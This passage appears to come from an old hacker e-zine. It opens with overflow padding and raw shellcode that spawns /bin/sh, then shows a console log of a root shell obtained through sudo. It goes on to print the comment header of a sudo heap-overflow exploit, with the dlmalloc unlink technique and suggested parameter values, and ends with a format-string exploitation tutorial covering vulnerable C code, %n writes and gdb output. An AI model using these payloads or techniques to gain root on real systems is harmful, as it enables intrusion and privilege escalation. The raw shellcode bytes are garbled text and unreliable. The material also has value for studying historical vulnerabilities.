AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAë$^‰^ 3Ò‰V‰V¸45V4N ‹ÑÍ€3À@Í€è×ÿÿÿ/bin/shAAAAAAAAAÿÿÿÿ?ëÿÿÿ´¡% Sorry, try again. sh-2.05# id uid=0(root) gid=0(root) groups=500(fc) sh-2.05# exit exit [fc@eurocomptonmachine sudo-1.6.3]$ :> MaXX doing sudo! /* * Created: November 1, 2001 * Updated: August 8, 2002 * ______ * / ___\ __ _ ____ ____ ____ ____ ____ __ _ * \____ \/ / \/ \/ \/ _ \ \ _ \/ / \ * / \___ \ \ \ \ \ ___/ \_/___ \___ \ * \______ / ____/__/ /__/ /___ \__/ / ____/ ____/ * \/\/ \/ \/ \/ \/ \/ * * Hudo versus Linux/Intel Sudo * "Another object superstitiously believed to embody magical powers" * Copyright (C) 2001 MaXX * * Okay.. I discovered a vulnerability in Sudo while I was working on * the Vudo exploit. All Sudo versions are vulnerable, even the latest * one. In the file check.c, function expand_prompt(), the author forgot * to reset the lastchar variable in the second loop. So if the last * character of the prompt (controlled by the attacker) is a '%', and if * the first character of the prompt is a 'u' or a 'h', the attacker can * trick expand_prompt() into performing an additional escape. * * But there was not enough memory allocated for this additional escape, * so the attacker effectively overflowed the new_prompt buffer (but the * severity of the overflow depends on the length of the username or * hostname). Quite a weird vulnerability. * * After a lot of research, I managed to exploit the bug.. the attacker * does not even need to know the password of the user used to run the * exploit (unlike the Vudo exploit.. exploiting the bug via nobody or * www-data works fine now). I transformed the whole overflow into a * one-byte heap overflow, which in this case was hard to exploit, but * was actually exploitable, and I managed to exploit the bug 7 times * out of the.. 7 times I tried the exploit. * * I wrote the most important comments in the hudo.c file, but will * explain the main technique, and also the most reliable way to find * out the two command line values needed in order to obtain a root * shell. BTW.. if you manage to exploit Sudo on other Linux/Intel * architectures, please update hudo.c and let me know.. thank you. * * Imagine you have a hole somewhere in the heap.. you store the * new_prompt buffer (whose size corresponds to the third command line * parameter of the Hudo exploit), which will be overflowed, at the * beginning of this hole. Now imagine that after new_prompt was stored * at the beginning of the hole, the size of the last_remainder chunk * (the rest of the hole) is equal to (0x100+16) bytes. If we overwrite * the LSByte of this size field with a NUL byte during the one-byte * overflow, the size of the last_remainder chunk will become 0x100. * * Now imagine buffers are allocated within the apparent 0x100 bytes * of the last_remainder chunk, and imagine the hole is finally filled * with a last allocated buffer. dlmalloc will be tricked into believing * that the beginning of the next contiguous allocated chunk is located * immediately after the end of that last allocated buffer, whereas * it is in fact located 16 bytes after the end of the last allocated * buffer (dlmalloc is fooled because we transformed (0x100+16) into * 0x100). * * So if the last allocated buffer is free()d, dlmalloc will try to * unlink() the next contiguous chunk, and will read an imaginary * boundary tag located within the aforementioned 16 bytes, where of * course the Hudo exploit stored a fake boundary tag (via the malloc() * and free() of a huge buffer (whose size corresponds to the second * command line parameter of the Hudo exploit) filled with fake boundary * tags). * * That's all, folks :) Try $((16392-8)) for cmnd_args_size, and * $((16392-8-256-16)) for sudo_prompt_size, it will work most of the * time. If it does not work, a brute force or guess process is needed.. * * -- MaXX */ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ #=> 0x06 Basic about format string ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ :> Introduction OK you will not become an m4d/elite c0d3r from reading this article, these are just some basic stuff about Format String Exploitation :> What do you need? 1) =>> GDB. 2) =>> Basic C knowledge. 3) =>> Knowledge of Buffer overflows. :> Format functions! Let me tell you something about formatting functions: 1) printf => "prints to stdout" 2) sprintf => "prints into a string" 3) fprintf => "prints to the file stream" 4) snprintf => "with length checking and prints into a string" 5) vfprintf => "Write output to the given output stream" Format functions basically produce an output to stdout. We control the output of this functions with a format string. I will tell you what they do and who they are. 1) %s => "Prints a string" 2) %d => "unsigned int output" 3) %u => "signed int output" 4) %c => "Single Character" 5) %f => "floating point conversion" :> Exploit it! Ok Let me make some example for you now...... ultra@parsisp:~$ cat lkm.c #include main(int argc, char **argv) { char buffer[1024]; if (argc < 2 ) exit(-1); strncpy(buffer, argv[1], sizeof(buffer)); printf(buffer); printf("\n"); } ultra@parsisp:~$ ultra@parsisp:~$ gcc lkm.c -o lkm ultra@parsisp:~$ ./lkm AAAAA AAAAA ultra@parsisp:~$ ./lkm "AAAA %x %x %x %x" AAAA bffffe97 400 0 72617000 ultra@parsisp:~$ We still need to find the format string.. so i go on.. So when we do ./lkm "AAAA %x %x %x %x" Internally the printf would look like this printf("AAAA %x %x %x %x"); Because the format string does not have a corresponding argument it does not know where to stop and will just grabbb the next address from the stack and dump its contents to the stdio. But how do we use this weakness to hijack the controll flow of a program ? Lets look at the coolest formatstring on planet earth .... Doing a man on snprintf reviels %n The number of characters written so far is stored into the integer indicated by the `int *'' (or variant) pointer argument. No argument is con- verted. In other words %n counts the number of written bytes and writes it to a supplied adress. Lets see an example ... ultra@parsisp:~$ cat lkm2.c #include int main(int argc, char **argv) { int tmp; char buffer[1024]; if (argc < 2 ) { printf("Usage: %s \n",argv[0]); exit(-1); } strncpy(buffer, argv[1], sizeof(buffer)); printf("%s%n\n", buffer, &tmp); printf("lkm = %p\n", tmp); printf(buffer); } ultra@parsisp:~$ ultra@parsisp:~$ ulimit -c unlimited ultra@parsisp:~$ ./lkm2 "AAAA%n" AAAA%n lkm = 0x6 Segmentation fault (core dumped) ultra@parsisp:~$ gdb lkm2 core -q (no debugging symbols found)...Core was generated by `./lkm2 AAAA%n'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x400591d3 in vfprintf () from /lib/libc.so.6 (gdb) x/i $eip 0x400591d3 : mov %ecx,(%eax) (gdb) printf "edi = %p\necx = %p\n", $edi, $ecx edi = 0x4 ecx = 0x41414141 (gdb) OK lets look at the gdb session and try to figure out what we are doing :) %n counted the 4 A's and tried to write 4 bytes (edi) to the address in ecx. So now we also know that by using %n it is possible to write to an address. So if we want to write 0xdeadbeef into ecx we will, have to increase %n to count 3735928559 bytes to get the desired value. Ok thats it now i will bring more about format string later ! ! !!! !!!!! ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ------------------------------------------------------------------------------------:: GreetZ: blackhat@IRCnet , aurecom , ack- , moogz , bajkero, shiftee , anakata, PHC henray , izik, I-Busy , omen1x , quiksand , hegemoOn , slashvar , sts hypno , ^sysq , ofer , shev , zirek , tonberi , c0de , fc , #smile crew ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ::###############################################################[www.blackhat.cx###:: Brought to you by :::::::. ::: :::. .,-::::: ::: . :: .: :::. :::::::::::: ;;;'';;' ;;; ;;`;; ,;;;'````' ;;; .;;,. ,;; ;;, ;;`;; ;;;;;;;;'''' [[[__[[\. [[[ ,[[ '[[, [[[ [[[[[/' ,[[[,,,[[[ ,[[ '[[, [[ $$""""Y$$ $$' c$$$cc$$$c $$$ _$$$$, "$$$"""$$$ c$$$cc$$$c $$ _88o,,od8Po88oo,.__ 888 888,`88bo,__,o, "888"88o, 888 "88o 888 888, 88, ""YUMMMP" """"YUMMM YMM ""` "YUMMMMMP" MMM "MMP" MMM YMM YMM ""` MMM #BlackHat@IRCnet <-> www.BlackHat.cx ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬